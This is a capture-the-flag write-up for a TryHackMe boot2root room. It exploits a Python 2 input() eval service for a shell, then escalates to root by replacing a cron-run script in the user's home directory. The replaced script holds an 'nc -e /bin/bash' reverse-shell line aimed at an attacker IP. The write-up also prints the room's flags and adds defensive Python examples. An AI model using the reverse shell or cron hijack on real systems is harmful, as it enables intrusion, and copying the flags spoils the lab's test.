Link room: https://tryhackme.com/room/bsidesgtdevelpy
Description:
boot2root machine for FIT and bsides Guatemala CTF

  • user.txt
    We start with an Nmap scan, which reveals two open ports: SSH on port 22 and an unidentified service on port 10000.
    PORT      STATE SERVICE           VERSION
    22/tcp    open  ssh               OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 78:c4:40:84:f4:42:13:8e:79:f8:6b:e4:6d:bf:d4:46 (RSA)
    |   256 25:9d:f3:29:a2:62:4b:24:f2:83:36:cf:a7:75:bb:66 (ECDSA)
    |_  256 e7:a0:07:b0:b9:cb:74:e9:d6:16:7d:7a:67:fe:c1:1d (ED25519)
    10000/tcp open  snet-sensor-mgmt?
    | fingerprint-strings: 
    |   GenericLines: 
    |     Private 0days
    |     Please enther number of exploits to send??: Traceback (most recent call last):
    |     File "./exploit.py", line 6, in <module>
    |     num_exploits = int(input(' Please enther number of exploits to send??: '))
    |     File "<string>", line 0
    |     SyntaxError: unexpected EOF while parsing
    |   GetRequest: 
    |     Private 0days
    |     Please enther number of exploits to send??: Traceback (most recent call last):
    |     File "./exploit.py", line 6, in <module>
    |     num_exploits = int(input(' Please enther number of exploits to send??: '))
    |     File "<string>", line 1, in <module>
    |     NameError: name 'GET' is not defined
    |   HTTPOptions, RTSPRequest: 
    |     Private 0days
    |     Please enther number of exploits to send??: Traceback (most recent call last):
    |     File "./exploit.py", line 6, in <module>
    |     num_exploits = int(input(' Please enther number of exploits to send??: '))
    |     File "<string>", line 1, in <module>
    |     NameError: name 'OPTIONS' is not defined
    |   NULL: 
    |     Private 0days
    |_    Please enther number of exploits to send??:
    If we open port 10000 in a browser, the service answers with a Python traceback that names the hidden program, exploit.py. The key detail is the File "<string>" frame together with NameError: name 'GET' is not defined: the browser's request line was evaluated as a Python expression. That is what Python 2's input() does (it is eval(raw_input())), so whatever a client sends is executed as Python, not just parsed as a number.
    This is the error:
    Please enther number of exploits to send??: Traceback (most recent call last):
      File "./exploit.py", line 6, in <module>
        num_exploits = int(input(' Please enther number of exploits to send??: '))
      File "<string>", line 1, in <module>
    NameError: name 'GET' is not defined
    Let's connect with telnet. The Python script asks for a number and then runs a fake "ping" ** times, where ** is the number we supplied:
    $ telnet 10.10.135.158 10000
    Trying 10.10.135.158...
    Connected to 10.10.135.158.
    Escape character is '^]'.
    
            Private 0days
    
     Please enther number of exploits to send??: 4
    
    Exploit started, attacking target (tryhackme.com)...
    Exploiting tryhackme internal network: beacons_seq=1 ttl=1337 time=0.064 ms
    Exploiting tryhackme internal network: beacons_seq=2 ttl=1337 time=0.032 ms
    Exploiting tryhackme internal network: beacons_seq=1 ttl=1337 time=0.023 ms
    Exploiting tryhackme internal network: beacons_seq=2 ttl=1337 time=0.164 ms
    Connection closed by foreign host.
    Because input() evaluates the client's text, instead of a number we send a Python expression that spawns a reverse shell back to our attacker VM, where a listener is waiting. The listener receives the callback and we have a shell as king:
    unknown@parrot:/data/vpn$ rlwrap nc -nlvp 4444
    listening on [any] 4444 ...
    connect to [10.9.0.54] from (UNKNOWN) [10.10.135.158] 38628
    SHELL=/bin/bash script -q /dev/null
    king@ubuntu:~$ 
    We list the home directory and read the flag:
    king@ubuntu:~$ ls -la
    ls -la
    total 324
    drwxr-xr-x 4 king king   4096 Aug 27  2019 .
    drwxr-xr-x 3 root root   4096 Aug 25  2019 ..
    -rw------- 1 root root   2929 Aug 27  2019 .bash_history
    -rw-r--r-- 1 king king    220 Aug 25  2019 .bash_logout
    -rw-r--r-- 1 king king   3771 Aug 25  2019 .bashrc
    drwx------ 2 king king   4096 Aug 25  2019 .cache
    -rwxrwxrwx 1 king king 272113 Aug 27  2019 credentials.png
    -rwxrwxrwx 1 king king    408 Aug 25  2019 exploit.py
    drwxrwxr-x 2 king king   4096 Aug 25  2019 .nano
    -rw-rw-r-- 1 king king      5 Jul  2 11:25 .pid
    -rw-r--r-- 1 king king    655 Aug 25  2019 .profile
    -rw-r--r-- 1 root root     32 Aug 25  2019 root.sh
    -rw-rw-r-- 1 king king    139 Aug 25  2019 run.sh
    -rw-r--r-- 1 king king      0 Aug 25  2019 .sudo_as_admin_successful
    -rw-rw-r-- 1 king king     33 Aug 27  2019 user.txt
    -rw-r--r-- 1 root root    183 Aug 25  2019 .wget-hsts
    king@ubuntu:~$ cat user.txt
    cat user.txt
    cf85ff769cfaaa721758949bf870b019
    USER FLAG: cf85ff769cfaaa721758949bf870b019
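Why the port-10000 service was exploitable, as an added example (this is not the room's exploit.py and not the author's payload): Python 2's input() is eval(raw_input()), so the line the client sends is evaluated before int() ever sees it. The block below emulates that behaviour in Python 3, reproduces the two errors nmap's fingerprint-strings captured (an empty line and a GET request line), shows that an arbitrary expression with an integer result is accepted as a "number", and puts a hardened parser beside it. The prompt text is copied from the page; the function names and the limit of 100 are assumptions.

```python
"""Python 2 input() == eval(raw_input()): the bug behind the port-10000 service.
Added example for this writeup; not the room's exploit.py."""


PROMPT = " Please enther number of exploits to send??: "  # verbatim from the service


def py2_input(line):
    """Emulate Python 2's input(): the client's text is evaluated as a Python
    expression. raw_input() would just return the string; input() wraps it in eval."""
    return eval(line)  # intentionally unsafe, this is the vulnerable behaviour


def vulnerable_count(line):
    """Mirrors exploit.py line 6 from the traceback: int(input(PROMPT))."""
    return int(py2_input(line))


def safe_count(line, limit=100):
    """Hardened version: accept digits only, never evaluate client input.
    The upper bound is an assumption; pick one that fits the service."""
    text = line.strip()
    if not text.isdigit():
        raise ValueError("expected a positive integer, got %r" % text)
    n = int(text)
    if not 1 <= n <= limit:
        raise ValueError("count out of range")
    return n


def probe(handler, line):
    """Feed one client line to a handler and report what the client would see.
    The real service leaked these exceptions as tracebacks, which is how nmap
    fingerprinted it and how we learned the script name and the eval behaviour."""
    try:
        return "ok", handler(line)
    except Exception as exc:
        return type(exc).__name__, str(exc)


if __name__ == "__main__":
    # Constructed client lines: nmap's NULL/GenericLines probe (empty line),
    # its GetRequest probe, a plain number, an expression, and an expression
    # with side effects that still yields an int (the code-execution primitive).
    for line in ["", "GET / HTTP/1.0", "4", "2+2", "__import__('os').getpid()"]:
        print("%-28r vulnerable=%r safe=%r" % (line,
              probe(vulnerable_count, line), probe(safe_count, line)))
```

The last probe line is the whole point: any expression whose value survives int() is accepted, so the "number of exploits" prompt is really a remote Python prompt running as the service user. The same class of bug shows up in any Python 2 code that calls input() on network or untrusted data; the fix is raw_input() (or Python 3) plus explicit validation, as safe_count() does.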
  • root.txt
    We cannot check king's sudo privileges with sudo -l because we don't have his password. There is an image called credentials.png but it does not help, so let's look at the crontab:
    king@ubuntu:~$ cat /etc/crontab
    cat /etc/crontab
    # /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.
    
    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    
    # m h dom mon dow user  command
    17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
    25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    *  *    * * *   king    cd /home/king/ && bash run.sh
    *  *    * * *   root    cd /home/king/ && bash root.sh
    *  *    * * *   root    cd /root/company && bash run.sh
    #
    Three custom jobs are scheduled every minute: one as king and two as root. The interesting one is root.sh, which root runs from /home/king/ 😂.
    This is the root.sh script in king's home:
    king@ubuntu:~$ cat /home/king/root.sh
    python /root/company/media/*.py
    king@ubuntu:~$ ls -l /home/king/root.sh
    ls -l /home/king/root.sh
    -rw-r--r-- 1 root root 32 Aug 25  2019 /home/king/root.sh
    Now it gets very interesting: root runs a script that lives in our own home directory. The file itself is owned by root and mode 644, so we cannot edit it, but /home/king is owned by king, and deleting a file only requires write permission on the directory, not on the file. So we remove root.sh and create our own with the same name; since cron runs it as "bash root.sh", it does not even need to be executable. 😁😁😁
    king@ubuntu:~$ cd /home/king/
    king@ubuntu:~$ rm root.sh
    king@ubuntu:~$ printf '#!/bin/bash\nnc -e /bin/bash 10.9.0.54 5555' > root.sh
    king@ubuntu:~$ chmod +x root.sh
    With a listener waiting on port 5555, we wait for the next minute; cron runs our root.sh as root and we get a root shell:
    root@ubuntu:/home/king# cd /root
    cd /root
    root@ubuntu:~# ll
    ll
    total 32
    drwx------  4 root root 4096 Aug 25  2019 ./
    drwxr-xr-x 22 root root 4096 Aug 25  2019 ../
    -rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
    drwxr-xr-x  4 root root 4096 Aug 27  2019 company/
    -rw-r--r--  1 root root 1185 Nov 12  2018 .gitignore
    drwxr-xr-x  2 root root 4096 Aug 25  2019 .nano/
    -rw-r--r--  1 root root  148 Aug 17  2015 .profile
    -rw-r--r--  1 root root   33 Aug 25  2019 root.txt
    root@ubuntu:~# cat root.txt
    cat root.txt
    9c37646777a53910a347f387dce025ec
    Root flag: 9c37646777a53910a347f387dce025ec
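The privilege escalation above works because of a directory permission, not a file permission, and that is easy to miss when only looking at "ls -l root.sh". The following added checker (written for this writeup, not part of the room or the author's steps) parses the three custom lines from the box's /etc/crontab, resolves the scripts behind "cd DIR && bash SCRIPT", and classifies each root job as "writable" (edit in place), "replaceable" (the file cannot be written, but its parent directory can, so unlink and recreate works, the root.sh case), or "safe". The permission check uses the stat bits relative to a given uid, deliberately ignoring root's override so it answers "what could king do?". The demo rebuilds the layout in a temporary directory, using mode 0444 to stand in for the root-owned 0644 file; the crontab text is a constructed sample copied from the page, and the function names and prefix argument are assumptions.

```python
"""Find cron jobs that run as root but whose script a low-privileged user can
edit or replace. Added example for this writeup; not part of the room."""
import os
import re
import stat
import tempfile

# Constructed sample: the non-default entries from the box's /etc/crontab.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
*  *    * * *   king    cd /home/king/ && bash run.sh
*  *    * * *   root    cd /home/king/ && bash root.sh
*  *    * * *   root    cd /root/company && bash run.sh
"""

INTERPRETERS = {"bash", "sh", "python", "python2", "python3", "perl"}


def parse_crontab(text):
    """Yield (user, command) for each job line of a system crontab (7-field form)."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue  # blank, comment, or VAR=value assignment
        fields = line.split(None, 6)
        if len(fields) == 7:
            yield fields[5], fields[6]


def script_targets(command):
    """Resolve script paths in 'cd DIR && INTERP SCRIPT' style commands."""
    cwd = "/"  # cron starts jobs in / (see the run-parts lines: 'cd / && ...')
    targets = []
    for part in re.split(r"\s*(?:&&|;|\|\|)\s*", command):
        argv = part.split()
        if not argv:
            continue
        if argv[0] == "cd" and len(argv) > 1:
            cwd = argv[1]
        elif argv[0] in INTERPRETERS and len(argv) > 1:
            targets.append(os.path.normpath(os.path.join(cwd, argv[1])))
    return targets


def mode_allows_write(st, uid, gids):
    """Permission-bit check for a non-root caller; root's override is ignored on
    purpose so the answer reflects what the unprivileged user could do."""
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def classify(path, uid, gids):
    """'writable': edit the script in place; 'replaceable': the file is not
    writable but its parent directory is, so rm + recreate works; else 'safe'."""
    try:
        if os.path.exists(path) and mode_allows_write(os.stat(path), uid, gids):
            return "writable"
        if mode_allows_write(os.stat(os.path.dirname(path)), uid, gids):
            return "replaceable"
    except OSError:  # e.g. /root is 0700: not even traversable by us
        pass
    return "safe"


def find_hijackable(crontab_text, uid=None, gids=None, prefix=""):
    """Return {script_path: verdict} for root jobs that are not 'safe'.
    prefix relocates the paths under a test directory (assumption for the demo)."""
    uid = os.getuid() if uid is None else uid
    gids = (set(os.getgroups()) | {os.getgid()}) if gids is None else set(gids)
    findings = {}
    for user, command in parse_crontab(crontab_text):
        if user != "root":
            continue
        for target in script_targets(command):
            verdict = classify(prefix + target, uid, gids)
            if verdict != "safe":
                findings[target] = verdict
    return findings


def demo():
    """Rebuild the box's layout in a temp dir: a read-only root.sh inside a home
    directory we own. 0o444 stands in for the root-owned 0644 file king can't write."""
    base = tempfile.mkdtemp()
    home = os.path.join(base, "home", "king")
    os.makedirs(home)
    os.chmod(home, 0o755)
    script = os.path.join(home, "root.sh")
    with open(script, "w") as fh:
        fh.write("python /root/company/media/*.py\n")
    os.chmod(script, 0o444)
    return find_hijackable(SAMPLE_CRONTAB, prefix=base)


if __name__ == "__main__":
    print(demo())  # /home/king/root.sh is 'replaceable'; /root/company/run.sh is not reachable
```

On a real box you would call find_hijackable(open("/etc/crontab").read()) as the low-privileged user and extend the same loop over /etc/cron.d and /var/spool/cron/crontabs; the defensive reading is the mirror image: root should never execute a script from a directory another user can write to, because directory write permission lets that user swap the file regardless of who owns it.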

SUMMARY:
